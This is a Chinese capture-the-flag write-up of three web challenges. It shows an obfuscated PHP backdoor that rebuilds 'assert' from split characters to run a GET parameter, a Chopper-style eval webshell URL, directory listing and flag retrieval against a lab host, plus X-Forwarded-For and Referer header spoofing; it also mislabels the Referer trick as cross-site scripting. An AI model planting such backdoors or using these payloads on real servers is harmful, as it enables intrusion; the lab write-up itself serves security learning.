shell

解题

word
word
得到的信息有最重要的

$poc="a#s#s#e#r#t"; 
$poc_1=explode("#",$poc);
$poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5];
$poc_2($_GET['s'])

简单分析:
1.将传入的字符串按“#” 进行拆分
2.将每个拆分出来的字母单独取出来
3.get传参

解题方向:
使用url传入变量s的值,尝试是不是有代码执行漏洞

简单鉴定下,如下:
end
既然存在这种漏洞,那接下来就简单多了。这里分享两种办法:

菜刀连接

连接的语句如下,使用菜刀连接的过程就不赘述了
http://114.67.175.224:15800/?s=@eval($_POST[%27caidao%27])

flag

使用url进行payload

访问目录信息

http://114.67.175.224:15800/?s=print_r(scandir(%27./%27))
返回信息
Array ( [0] => . [1] => .. [2] => flaga15808abee46a1d5.txt [3] => index.php )
证明当前目录下有flag文件
尝试打开文件得到flag

http://114.67.175.224:15800/flaga15808abee46a1d5.txt
返回flag
flag{fae9ddc2a5afda6fe332b4b32fb8053a}

flag

总结

PHP任意代码执行漏洞

phpinfo():显示php相关信息
scandir(path):显示目录信息,以数组的形式存储

程序员本地网站

解题

word
word
程序员本地访问:意思是本地。
写个XFF抓个包就能绕过去了。
word
word


总结

XFF伪造攻击
X-Forwarded-For: 127.0.0.1

你从哪里来

解题

head
head
获得的信息很简单,只有一条:改源头
改出处为谷歌,得到flag
head
head

总结

跨站脚本攻击

Referer:指定访问的源url。